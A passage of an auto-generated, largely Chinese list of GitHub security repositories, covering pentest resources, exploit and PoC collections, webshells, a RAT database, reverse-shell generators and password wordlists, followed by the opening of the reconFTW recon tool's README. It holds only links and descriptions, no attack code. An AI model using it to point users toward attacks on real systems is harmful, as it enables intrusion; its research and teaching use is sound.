[DataXrefCounter ](https://github.com/onethawt/idapyscripts/blob/master/dataxrefcounter.py) 枚举指定区段的所有交叉引用,计算使用频率 - [**21**星][3y] [aozhimin/ios-monitor-resources](https://github.com/aozhimin/ios-monitor-resources) 对各厂商的 iOS SDK 性能监控方案的整理和收集后的资源 - [**21**星][6y] [Py] [carlpulley/volatility](https://github.com/carlpulley/volatility) A collection of Volatility Framework plugins. - [**21**星][2y] [TeX] [citp/anomalous-tor-keys](https://github.com/citp/anomalous-tor-keys) Analysis of archived Tor relay RSA public keys - [**21**星][5m] [C] [cyclaero/void-zones-tools](https://github.com/cyclaero/void-zones-tools) Prepare a list of void zones that can be readily feed into Unbound on FreeBSD - [**21**星][1m] [extremecoders-re/re-list](https://github.com/extremecoders-re/re-list) A list of open source reverse engineering tools with a focus on binary analysis - [**21**星][4y] [fabiobaroni/awesome-pentest](https://github.com/fabiobaroni/awesome-pentest) A collection of awesome penetration testing resources, tools and other shiny things - [**21**星][5y] [shieldfy/awesome-pentest](https://github.com/shieldfy/awesome-pentest) A collection of awesome penetration testing resources, tools and other shiny things - [**21**星][10m] [slowmist/awesome-blockchain-bug-bounty](https://github.com/slowmist/awesome-blockchain-bug-bounty) A comprehensive curated list of available Blockchain Bug Bounty Programs. - [**21**星][2m] [status-im/awesome-secure-messaging](https://github.com/status-im/awesome-secure-messaging) A curated collection of links for secure messaging. - [**21**星][2y] [0x90/firmware-arsenal](https://github.com/0x90/firmware-arsenal) Tools and scripts for firmware reverse engeneering - [**21**星][3m] [alexanderstonec/top-100-hacking-security-e-books-free-download-2019](https://github.com/alexanderstonec/top-100-hacking-security-e-books-free-download-2019) Hacking and Cyber Security Ebooks | For More Visit - - [**20**星][3y] [TeX] [edelahozuah/awesome-tls-security](https://github.com/edelahozuah/awesome-tls-security) A collection of (not-so, yet) awesome resources related to TLS, PKI and related stuff - [**20**星][2m] [edwardqiu/awesome-infosec](https://github.com/edwardqiu/awesome-infosec) A curated list of awesome infosec blog posts, courses, books and more! - [**20**星][1y] [seifreed/awesome-sandbox-evasion](https://github.com/seifreed/awesome-sandbox-evasion) A summary about different projects/presentations/tools to test how to evade malware sandbox systems - [**19**星][1y] [annalorimer/security-resources](https://github.com/annalorimer/security-resources) A list of stuff to learn more about security! - [**19**星][1y] [exaybachay-ak/securityadvice](https://github.com/exaybachay-ak/securityadvice) Collection of advice to new IT security folks - [**19**星][3y] [Shell] [operatorequals/oneliner-sh](https://github.com/operatorequals/oneliner-sh) oneliner is a tool that gives a list of compatible reverse-shell-string oneliners - [**19**星][2y] [voidhack/toolset](https://github.com/voidhack/toolset) Useful tools for CTF competitions - [**19**星][2y] [hunter-github/evil-and-not-wholly-awesome-firefox](https://github.com/Hunter-Github/evil-and-not-wholly-awesome-firefox) [deprecated since Mozilla turned evil] A list of resources for and about Mozilla Firefox - [**19**星][7m] [C#] [rainkin1993/remote-access-trojan-database](https://github.com/rainkin1993/remote-access-trojan-database) A database of RAT collected from Internet - [**18**星][3y] [Shell] [mitchellkrogza/linux-server-administration-scripts](https://github.com/mitchellkrogza/linux-server-administration-scripts) Simple bash administration scripts for Linux to make your life easier. - [**18**星][3y] [shakenetwork/malwareanalysis](https://github.com/shakenetwork/malwareanalysis) 恶意软件分析工具和资源列表 - [**17**星][2y] [cherishao/security-box](https://github.com/cherishao/security-box) 安全盒子,这里主要指的是自己备份的安全行业相关小工具项目集。 - [**17**星][4y] [fabiobaroni/awesome-web-hacking](https://github.com/fabiobaroni/awesome-web-hacking) A list of web application security - [**17**星][7m] [imfht/websecurityscannerwhitepaper](https://github.com/imfht/websecurityscannerwhitepaper) 收集网络上公开的漏洞扫描器的白皮书。 - [**16**星][3y] [0xc1r3ng/malware-sandboxes-malware-source](https://github.com/0xc1r3ng/malware-sandboxes-malware-source) Malware Sandboxes & Malware Source - [**16**星][2y] [Py] [b4zinga/explib](https://github.com/b4zinga/explib) Explib: Collections of poc and exp. - [**16**星][4y] [demonsec666/pentest_study](https://github.com/demonsec666/pentest_study) 从零开始内网渗透学习 - [**16**星][1y] [Py] [portswigger/additional-scanner-checks](https://github.com/portswigger/additional-scanner-checks) Collection of scanner checks missing in Burp - [**15**星][10m] [anyeduke/at-p-list](https://github.com/anyeduke/at-p-list) 攻防清单:用于整理当前收集的所有攻防相关资源 - [**15**星][2y] [Py] [ecbftw/poc](https://github.com/ecbftw/poc) A collection of published exploits and proof-of-concept code. - [**15**星][1y] [ilovecode2018/awesome-osint](https://github.com/ilovecode2018/awesome-osint) A curated list of amazingly awesome open source intelligence tools and resources - [**15**星][1y] [nytrorst/presentations](https://github.com/nytrorst/presentations) My presentations from different conferences - [**15**星][7m] [C] [yuawn/ais3-2019-pre-exam](https://github.com/yuawn/ais3-2019-pre-exam) My pwn challeges for AIS3 2019 Pre-exam. - [**15**星][2y] [shmilylty/malware-analysis-tools](https://github.com/shmilylty/Malware-Analysis-Tools) 恶意软件分析套件 - [**15**星][1y] [adhdproject/awesome-active-defense](https://github.com/adhdproject/awesome-active-defense) an awesome list of active defense resources - [**14**星][2y] [3xp10it/xlearn](https://github.com/3xp10it/xlearn) 记录安全界大牛分享经验 - [**14**星][3y] [Py] [ernw/ctf-writeups](https://github.com/ernw/ctf-writeups) Collection of CTF writeups - [**14**星][1y] [JS] [osrdrivers/windbg-exts](https://github.com/osrdrivers/windbg-exts) Various WinDbg extensions and scripts - [**14**星][1y] [probely/security_checklist](https://github.com/probely/security_checklist) Web Application Security Checklist - [**14**星][30d] [Py] [ricardojoserf/wifi-pentesting-guide](https://github.com/ricardojoserf/wifi-pentesting-guide) WiFi Penetration Testing Guide - [**14**星][1y] [vagnes/infosecguide](https://github.com/vagnes/infosecguide) infosec.guide is a collection of resources for anyone in the infosec field - [**14**星][3y] [xeushack/awesome-hacking-practice](https://github.com/xeushack/awesome-hacking-practice) A curated list of websites and apps to help you practice hacking - [**13**星][4y] [djadmin/awesome-security](https://github.com/djadmin/awesome-security) A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [**13**星][4y] [joesecurity/awesome-malware-analysis](https://github.com/joesecurity/awesome-malware-analysis) A curated list of awesome malware analysis tools and resources - [**12**星][2y] [alchu4n/sec_chart](https://github.com/alchu4n/sec_chart) 有关信息安全的一些截图及流程图分享 - [**12**星][3y] [paralax/awesome-pentest-1](https://github.com/paralax/awesome-pentest-1) Awesome Penetration Testing A collection of awesome penetration testing resources - [**12**星][5m] [wuseman/wnmap](https://github.com/wuseman/wnmap) This is a cheatsheet for mastering nmap - [**12**星][30d] [gaurav-gogia/dftools](https://github.com/gaurav-gogia/dftools) A curated list of digital forensic tools. - [**12**星][1m] [albertzsigovits/mal-analysis-tools](https://github.com/albertzsigovits/mal-analysis-tools) A curated list of malware repositories, trackers and malware analysis tools - [**11**星][28d] [YARA] [deadbits/yara-rules](https://github.com/deadbits/yara-rules) Collection of YARA signatures from individual research - [**11**星][2y] [dictionaryhouse/sql-injection-fuzzpayload-collection](https://github.com/dictionaryhouse/sql-injection-fuzzpayload-collection) Sql-injection FuzzPayload 集合 - [**11**星][7m] [HTML] [lambdacasserole/hack-this](https://github.com/lambdacasserole/hack-this) A collection of common web programming security mistakes. - [**11**星][4y] [PHP] [yunkaiyueming/php_back_door_code](https://github.com/yunkaiyueming/php_back_door_code) PHP后门代码汇总 - [**11**星][2y] [Py] [redteamwing/pentest-wiki](https://github.com/RedTeamWing/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others. - [**11**星][1y] [hackinfinity/honey-pots-](https://github.com/hackinfinity/honey-pots-) My collection of Honeypot resources - [**10**星][1y] [Py] [ecx86/ida-scripts](https://github.com/ecx86/ida-scripts) IDA Pro/Hex-Rays configs, scripts, and plugins收集 - [**10**星][2y] [hxy9243/whotofollow](https://github.com/hxy9243/whotofollow) Who to follow on Twitter/Telegram - [**10**星][4y] [Py] [randomsctf/ctf-scripts](https://github.com/randomsctf/ctf-scripts) A collection of short scripts for analysis, encryption and forensics, that can be used for CTF and/or security assessments - [**10**星][9m] [JS] [twlinux/lets-talk](https://github.com/twlinux/lets-talk) Intentionally vulnerable website that demonstrates beginner-level injection vulnerabilities - [**9**星][4y] [gavz/awesome-windows-exploitation](https://github.com/gavz/awesome-windows-exploitation) A curated list of awesome Windows Exploitation resources, and shiny things. - [**8**星][28d] [Shell] [kbnlresearch/forensicimagingresources](https://github.com/kbnlresearch/forensicimagingresources) resources and documentation related to an effort at setting up an experimental small-scale forensic imaging facility. - [**8**星][1y] [newcon/securitytools](https://github.com/newcon/securitytools) A list of security tools that includes free, opensourse and paid ones too. - [**8**星][1y] [testrockytesting/awesome-cloud-osint](https://github.com/testrockytesting/awesome-cloud-osint) This repository will host resources for collecting information about cloud providers - SaaS, IaaS, PaaS, DaaS etc. - [**7**星][1y] [Py] [aye-whitehat/ctf-collection](https://github.com/aye-whitehat/ctf-collection) - [**7**星][2y] [cuccs/ns](https://github.com/cuccs/ns) 网络安全课程作业收集 - [**7**星][2y] [dictionaryhouse/the-security-handbook-kali-linux](https://github.com/dictionaryhouse/the-security-handbook-kali-linux) A useful reference guide and a handbook of security basics for those starting out. - [**7**星][1m] [mitchellkrogza/badd-boyz-bitcoin-scammers](https://github.com/mitchellkrogza/badd-boyz-bitcoin-scammers) A list of bitcoin addresses being used in Ransomware and Sextortion Scams - [**7**星][2m] [Shell] [oldbonhart/cheat_sheets](https://github.com/oldbonhart/cheat_sheets) cheat-sheets for network security - [**7**星][28d] [HTML] [arch3rpro/pentesttools](https://github.com/arch3rpro/pentesttools) Awesome Pentest Tools Collection - [**6**星][2y] [Py] [benderpan/pocs](https://github.com/benderpan/pocs) 整理收集的一些漏洞利用POC+一些扫描类的实现。 - [**6**星][3y] [C] [degrigis/exploitation](https://github.com/degrigis/exploitation) Repo for various exploitation utilities/PoC/Shellcodes/CTF solutions - [**6**星][3y] [jasonmiacono/iocs](https://github.com/jasonmiacono/iocs) Indicators of compromise for threat intelligence - [**6**星][4y] [mattulm/sfiles_yara](https://github.com/mattulm/sfiles_yara) A collection of YARA signatures that I have found around the web. - [**6**星][4y] [Shell] [thoqbk/code-collection](https://github.com/thoqbk/code-collection) A shell script tool for decompiling multiple jar files and re-arranging source code - [**6**星][8m] [stendarr/funny-tech-talks](https://github.com/stendarr/funny-tech-talks) A list of funny talks about Technology and Computer Science - [**5**星][3y] [agnosticlines/binaryninja-plugins](https://github.com/agnosticlines/binaryninja-plugins) A repo with a listing of binary ninja scripts + plugins (massively inspired by - [**5**星][2m] [repnz/windbg-cheat-sheet](https://github.com/repnz/windbg-cheat-sheet) My personal cheat sheet for using WinDbg for kernel debugging - [**4**星][1m] [arkecosystem/security-vulnerabilities](https://github.com/arkecosystem/security-vulnerabilities) List of known and closed security vulnerabilities related to our products. - [**4**星][4y] [PHP] [blackhalt/webshells](https://github.com/blackhalt/webshells) An list of webshell vulnerability injection. - [**4**星][7m] [gexos/malrepo](https://github.com/gexos/malrepo) A collection of malware samples caught by DIONAEA Honeypot - [**4**星][2y] [netseclab/paper_for_digital_forensics](https://github.com/netseclab/paper_for_digital_forensics) This is a collection of papers, codes, issues for digital forensics. - [**3**星][5y] [api0cradle/shmoocon-2015](https://github.com/api0cradle/shmoocon-2015) ShmooCon Slides/ Proceedings Draft - [**3**星][5m] [Java] [hktalent/myhktools](https://github.com/hktalent/myhktools) - [**2**星][2y] [androidtamer/awesome_android_pentest](https://github.com/androidtamer/awesome_android_pentest) Awesome android Pentest tools collection - [**2**星][4y] [C] [geekben/cve-collections](https://github.com/geekben/cve-collections) collect the POC and EXP for recent CVEs - [**2**星][2y] [kanglib/edu_for](https://github.com/kanglib/edu_for) A cheat sheet for digital forensics - [**2**星][2y] [PS] [truekonrads/powerspells](https://github.com/truekonrads/powerspells) Small collection of powershell scripts useful during lateral movement - [**1**星][2y] [PHP] [12345bt/webshell](https://github.com/12345bt/webshell) webshell收集项目 - [**1**星][1y] [iamprbkr/awesomebugbounty4noob](https://github.com/iamprbkr/awesomebugbounty4noob) Awesome Resources for beginners on how to find websites/Domains/Targets for Bugbounty/Pentesting/Responsible Disclosure - [**1**星][2y] [Py] [monkeyman79/janitor](https://github.com/monkeyman79/janitor) Collection of GDB commands for low-level debugging, aimed at bringing debug.exe flavor into GDB command line interface. - [**1**星][3y] [sunu11/sec-box](https://github.com/sunu11/sec-box) information security Tools Box (信息安全工具集合) - [**1**星][6m] [sv4us/ebook](https://github.com/sv4us/ebook) ebook programing reverse pentest - [**1**星][3m] [kingsabri/aggressorscripts](https://github.com/kingsabri/aggressorscripts) A collection of Cobalt Strike aggressor scripts - [**0**星][2y] [goel42/meltdown-spectre-bug-poc-collection](https://github.com/goel42/meltdown-spectre-bug-poc-collection) Aggregating the Proof of Concept published so far. - [**0**星][2y] [goel42/meltdown-spectre-poc-collection](https://github.com/goel42/meltdown-spectre-poc-collection) Aggregating the Proof of Concept published so far. - [**0**星][10m] [Py] [ponusjang/poc-exp-collection](https://github.com/ponusjang/poc-exp-collection) Poc&Exp Collection - [**0**星][11m] [s3curityb3ast/s3curityb3ast.github.io](https://github.com/s3curityb3ast/s3curityb3ast.github.io) Kaustubh's security advisories - [**0**星][5y] [andrewsmhay/research](https://github.com/andrewsmhay/research) Collection of my research and studies *** ## <a id="9f9fed5b730bc5bfceaaf77da3aa719e"></a>笔记&&文章&&教程 - [**24956**星][10d] [xitu/gold-miner](https://github.com/xitu/gold-miner) 翻译优质互联网技术文章的社区 - [**15776**星][10m] [micropoor/micro8](https://github.com/micropoor/micro8) 从业10年渗透笔记 - [**5513**星][9m] [carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) Hacking教程、工具和资源 - [**4174**星][2y] [forter/security-101-for-saas-startups](https://github.com/forter/security-101-for-saas-startups) 初学者安全小窍门 - [**2918**星][10d] [secfigo/awesome-fuzzing](https://github.com/secfigo/awesome-fuzzing) A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. - [**2529**星][4m] [kbandla/aptnotes](https://github.com/kbandla/aptnotes) Various public documents, whitepapers and articles about APT campaigns - [**1871**星][5m] [bypass007/emergency-response-notes](https://github.com/bypass007/emergency-response-notes) 应急响应实战笔记,一个安全工程师的自我修养。 - [**1679**星][7m] [dsasmblr/game-hacking](https://github.com/dsasmblr/game-hacking) Tutorials, tools, and more as related to reverse engineering video games. - [**1457**星][3y] [tiancode/learn-hacking](https://github.com/tiancode/learn-hacking) 开始学习Kali Linux 各种破解教程 渗透测试 逆向工程 HackThisSite挑战问题解答 - [**1229**星][6m] [chalker/notes](https://github.com/chalker/notes) Some public notes - [**893**星][1m] [aptnotes/data](https://github.com/aptnotes/data) APTnotes data - [**883**星][4m] [escapingbug/awesome-browser-exploit](https://github.com/escapingbug/awesome-browser-exploit) awesome list of browser exploitation tutorials - [**773**星][1y] [pfarb/awesome-crypto-papers](https://github.com/pfarb/awesome-crypto-papers) A curated list of cryptography papers, articles, tutorials and howtos. - [**750**星][4y] [fabiobaroni/awesome-exploit-development](https://github.com/fabiobaroni/awesome-exploit-development) A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development - [**723**星][4m] [uknowsec/active-directory-pentest-notes](https://github.com/uknowsec/active-directory-pentest-notes) 个人域渗透学习笔记 - [**683**星][1y] [HTML] [zhengmin1989/myarticles](https://github.com/zhengmin1989/myarticles) 蒸米的文章(iOS冰与火之歌系列,一步一步学ROP系列,安卓动态调试七种武器系列等) - [**671**星][1y] [dsasmblr/hacking-online-games](https://github.com/dsasmblr/hacking-online-games) A curated list of tutorials/resources for hacking online games. - [**607**星][2y] [HTML] [jiji262/wooyun_articles](https://github.com/jiji262/wooyun_articles) drops.wooyun.org 乌云Drops文章备份 - [**558**星][3y] [advanced-threat-research/firmware-security-training](https://github.com/advanced-threat-research/firmware-security-training) 固件安全教程:从攻击者和防卫者的角度看BIOS / UEFI系统固件的安全 - [**478**星][2m] [xiangpasama/jdsrc-small-classroom](https://github.com/xiangpasama/jdsrc-small-classroom) 京东SRC小课堂系列文章 - [**448**星][8m] [jnusimba/miscsecnotes](https://github.com/jnusimba/miscsecnotes) some learning notes about Web/Cloud/Docker Security、 Penetration Test、 Security Building - [**425**星][10m] [C] [hardenedlinux/linux-exploit-development-tutorial](https://github.com/hardenedlinux/linux-exploit-development-tutorial) a series tutorial for linux exploit development to newbie. - [**383**星][7m] [jnusimba/androidsecnotes](https://github.com/jnusimba/androidsecnotes) some learning notes about Android Security - [**383**星][1y] [HTML] [maestron/reverse-engineering-tutorials](https://github.com/maestron/reverse-engineering-tutorials) Reverse Engineering Tutorials - [**379**星][7m] [unprovable/pentesthardware](https://github.com/unprovable/pentesthardware) 公开笔记整理 - [**369**星][2y] [jaybosamiya/security-notes](https://github.com/jaybosamiya/security-notes) notes on the security related videos I watch (as a way of quick recall). - [**359**星][3y] [Py] [sangaline/advanced-web-scraping-tutorial](https://github.com/sangaline/advanced-web-scraping-tutorial) The Zipru scraper developed in the Advanced Web Scraping Tutorial. - [**299**星][1y] [Py] [anasaboureada/penetration-testing-study-notes](https://github.com/AnasAboureada/Penetration-Testing-Study-Notes) Penetration Testing notes, resources and scripts - [**269**星][2y] [sam-b/windows_kernel_resources](https://github.com/sam-b/windows_kernel_resources) Papers, blogposts, tutorials etc for learning about Windows kernel exploitation, internals and (r|b)ootkits - [**233**星][2y] [C] [hardenedlinux/grsecurity-101-tutorials](https://github.com/hardenedlinux/grsecurity-101-tutorials) 增强 Linux 内核安全的内核补丁集 - [**222**星][1y] [C++] [wnagzihxa1n/browsersecurity](https://github.com/wnagzihxa1n/browsersecurity) 我在学习浏览器安全过程中整理的漏洞分析笔记与相关的学习资料 - [**220**星][2y] [Py] [wwong99/pentest-notes](https://github.com/wwong99/pentest-notes) all my penetration testing study notes, penetration testing tools, scripts, techniques, tricks and also many scripts that I found them useful from all over the internet. - [**213**星][4m] [Shell] [xu-jian/vps](https://github.com/xu-jian/vps) 个人笔记汇总 - [**204**星][2y] [C] [peperunas/injectopi](https://github.com/peperunas/injectopi) 一堆Windows 代码注入教程 - [**176**星][1m] [microsvuln/awesome-afl](https://github.com/microsvuln/awesome-afl) A curated list of different AFL forks and AFL inspired fuzzers with detailed equivalent academic papers with AFL-fuzzing tutorials - [**174**星][2y] [C] [geosn0w/reverse-engineering-tutorials](https://github.com/geosn0w/reverse-engineering-tutorials) Some Reverse Engineering Tutorials for Beginners - [**161**星][1y] [jnusimba/linuxsecnotes](https://github.com/jnusimba/linuxsecnotes) some learning notes about Linux Security - [**140**星][2y] [spoock1024/web-security](https://github.com/spoock1024/web-security) Web安全中比较好的文章 - [**133**星][3y] [PHP] [ksanchezcld/hacking_cheat_sheet](https://github.com/ksanchezcld/hacking_cheat_sheet) All my Hacking|Pentesting Notes - [**128**星][2y] [C] [firmianay/life-long-learner](https://github.com/firmianay/life-long-learner) Personal Notes About Everything. - [**103**星][2y] [Py] [1111joe1111/tuts](https://github.com/1111joe1111/tuts) Reverse engineering tutorials - [**98**星][11d] [smi1esec/web-security-note](https://github.com/Smi1eSEC/Web-Security-Note) Record some common Web security sites - [**74**星][2y] [HTML] [anquanquantao/pentraining](https://github.com/anquanquantao/pentraining) 一个网络安全基础知识的教程。内容比较杂,好在都是实验视频和工具提供,可以自行动手完成实验。 - [**74**星][2y] [Assembly] [azeria-labs/arm-assembly-examples](https://github.com/azeria-labs/arm-assembly-examples) Snippets from ARM assembly tutorials - [**63**星][10m] [C] [zigzagsecurity/survival-guide-radare2](https://github.com/zigzagsecurity/survival-guide-radare2) Basic tutorials for reverse engineer with radare2 - [**60**星][13d] [leipzig/awesome-reproducible-research](https://github.com/leipzig/awesome-reproducible-research) A curated list of reproducible research case studies, projects, tutorials, and media - [**52**星][12m] [feicong/zsxq_archives](https://github.com/feicong/zsxq_archives) 【软件安全与知识星球】精华文章列表 - [**47**星][27d] [Py] [ercoppa/symbolic-execution-tutorial](https://github.com/ercoppa/symbolic-execution-tutorial) Tutorial on Symbolic Execution. Hands-on session is based on the angr framework. - [**41**星][1m] [mykings/security-study-tutorial](https://github.com/mykings/security-study-tutorial) Summary of online learning materials - [**41**星][10m] [C++] [thebabush/dumb-obfuscator](https://github.com/thebabush/dumb-obfuscator) Tutorial on how to write the dumbest obfuscator I could think of. - [**28**星][1y] [JS] [wahengchang/nodejs-security-must-know](https://github.com/wahengchang/nodejs-security-must-know) It is a note about security on nodejs - [**20**星][28d] [Py] [0x25/useful](https://github.com/0x25/useful) useful pentest note - [**12**星][1m] [HTML] [gnebbia/nmap_tutorial](https://github.com/gnebbia/nmap_tutorial) Some collected notes about nmap - [**0**星][1y] [C++] [linux-sir/arm_reverse_engineer](https://github.com/linux-sir/arm_reverse_engineer) ARM平台逆向工程学习笔记 *** ## <a id="6a5d962d62378399d7e12c1690188e7a"></a>Wordlist - [**6033**星][28d] [berzerk0/probable-wordlists](https://github.com/berzerk0/probable-wordlists) Version 2 is live! Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular! - [**2314**星][2y] [Py] [rootphantomer/blasting_dictionary](https://github.com/rootphantomer/blasting_dictionary) 爆破字典 - [**917**星][15d] [Batchfile] [mr-xn/burpsuite-collections](https://github.com/mr-xn/burpsuite-collections) BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程 - [**628**星][4y] [jeanphorn/wordlist](https://github.com/jeanphorn/wordlist) Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords. - [**315**星][2y] [Shell] [kennyn510/wpa2-wordlists](https://github.com/kennyn510/wpa2-wordlists) A collection of wordlists dictionaries for password cracking - [**314**星][8m] [Py] [screetsec/brutesploit](https://github.com/screetsec/brutesploit) BruteSploit is a collection of method for automated Generate, Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation,combine,transform and permutation some words or file text :p - [**180**星][4y] [Shell] [nccgroup/cisco-snmp-enumeration](https://github.com/nccgroup/cisco-snmp-enumeration) Automated Cisco SNMP Enumeration, Brute Force, Configuration Download and Password Cracking - [**136**星][6m] [tarraschk/richelieu](https://github.com/tarraschk/richelieu) List of the most common French passwords - [**82**星][6y] [Java] [schierlm/javapayload](https://github.com/schierlm/javapayload) JavaPayload is a collection of pure Java payloads to be used for post-exploitation from pure Java exploits or from common misconfigurations (like not password protected Tomcat manager or debugger port). - [**77**星][2y] [Py] [stasinopoulos/jaidam](https://github.com/stasinopoulos/jaidam) Jaidam is an open source penetration testing tool that would take as input a list of domain names, scan them, determine if wordpress or joomla platform was used and finally check them automatically, for web vulnerabilities using two well‐known open source tools, WPScan and Joomscan. - [**70**星][3y] [screetsec/wordlist-dracos](https://github.com/screetsec/wordlist-dracos) Collection My Wordlist - [**58**星][7m] [HTML] [tgeaus/weak-password](https://github.com/tgeaus/weak-password) 字典大全 - [**35**星][3y] [arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) List of default passwords for Industrial Control Systems - [**27**星][8m] [PS] [onelogicalmyth/invoke-gppcse](https://github.com/onelogicalmyth/invoke-gppcse) Obtains a list of GPOs based on known Client Side Extensions (CSE) that normally contain passwords - [**24**星][2y] [PHP] [skyzyx/bad-passwords](https://github.com/skyzyx/bad-passwords) A list of the top 10,000 most-used passwords from hacked password lists. - [**23**星][3y] [Go] [hgfischer/domainerator](https://github.com/hgfischer/domainerator) Simple application written in Go that combines two wordlists and a list of TLDs to form domain names and check if they are already registered. - [**21**星][2y] [troydo42/awesome-pen-test](https://github.com/troydo42/awesome-pen-test) Experiment with penetration testing Guides and Tools for WordPress, iOS, MacOS, Wifi and Car - [**12**星][2y] [cujanovic/virtual-host-wordlist](https://github.com/cujanovic/virtual-host-wordlist) Virtual host wordlist - [**8**星][3y] [Py] [nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) An organized collection of default passwords for various devices and services. - [**5**星][3y] [cujanovic/dirsearch-wordlist](https://github.com/cujanovic/dirsearch-wordlist) Serbian/English wordlist for *** ## <a id="cf11bcd58b4ec7a549bfb11297003180"></a>爬虫 - [**11489**星][2m] [facert/awesome-spider](https://github.com/facert/awesome-spider) 爬虫集合 - [**5807**星][3m] [Py] [luyishisi/anti-anti-spider](https://github.com/luyishisi/anti-anti-spider) 越来越多的网站具有反爬虫特性,有的用图片隐藏关键数据,有的使用反人类的验证码,建立反反爬虫的代码仓库,通过与不同特性的网站做斗争(无恶意)提高技术。 - [**4407**星][2y] [Py] [lining0806/pythonspidernotes](https://github.com/lining0806/pythonspidernotes) Python入门网络爬虫之精华版 - [**3901**星][3m] [brucedone/awesome-crawler](https://github.com/brucedone/awesome-crawler) A collection of awesome web crawler,spider in different languages - [**3504**星][6m] [PHP] [hanc00l/wooyun_public](https://github.com/hanc00l/wooyun_public) This repo is archived. Thanks for wooyun! 乌云公开漏洞、知识库爬虫和搜索 crawl and search for wooyun.org public bug(vulnerability) and drops - [**2753**星][2m] [Py] [kr1s77/python-crawler-tutorial-starts-from-zero](https://github.com/Kr1s77/Python-crawler-tutorial-starts-from-zero) python爬虫教程,带你从零到一,包含js逆向,selenium, tesseract OCR识别,mongodb的使用,以及scrapy框架 - [**2479**星][1y] [Py] [geekan/scrapy-examples](https://github.com/geekan/scrapy-examples) Multifarious Scrapy examples. Spiders for alexa / amazon / douban / douyu / github / linkedin etc. - [**2437**星][2m] [Py] [the0demiurge/shadowsocksshare](https://github.com/the0demiurge/shadowsocksshare) 从ss(r)共享网站爬虫获取共享ss(r)账号,通过解析并校验账号连通性,重新分发账号并生成订阅链接 - [**1997**星][2m] [Py] [wistbean/learn_python3_spider](https://github.com/wistbean/learn_python3_spider) python爬虫教程系列、从0到1学习python爬虫,包括浏览器抓包,手机APP抓包,如 fiddler、mitmproxy,各种爬虫涉及的模块的使用 - [**1130**星][1m] [HTML] [ehco1996/python-crawler](https://github.com/ehco1996/python-crawler) 从头开始 系统化的 学习如何写Python爬虫。 Python版本 3.6 - [**509**星][12d] [Py] [mozillasecurity/funfuzz](https://github.com/mozillasecurity/funfuzz) A collection of fuzzers in a harness for testing the SpiderMonkey JavaScript engine. - [**384**星][4y] [PHP] [spiderlabs/mcir](https://github.com/spiderlabs/mcir) The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. - [**215**星][3y] [liinnux/awesome-crawler-cn](https://github.com/liinnux/awesome-crawler-cn) 互联网爬虫,蜘蛛,数据采集器,网页解析器的汇总,因新技术不断发展,新框架层出不穷,此文会不断更新... - [**51**星][2m] [Py] [ahmia/ahmia-crawler](https://github.com/ahmia/ahmia-crawler) Collection of crawlers used by the ahmia search engine - [**37**星][1y] [chenjiandongx/awesome-spider](https://github.com/chenjiandongx/awesome-spider) 爬虫集合 # 贡献 内容为系统自动导出, 有任何问题请提issue
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.4"> <img src="https://img.shields.io/badge/release-v2.4-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options) - [c) Terraform + Ansible](#c-terraform--ansible) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [Support this project](#support-this-project) - [Buymeacoffee](#buymeacoffee) - [DigitalOcean referral link](#digitalocean-referral-link) - [GitHub sponsorship](#github-sponsorship) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - 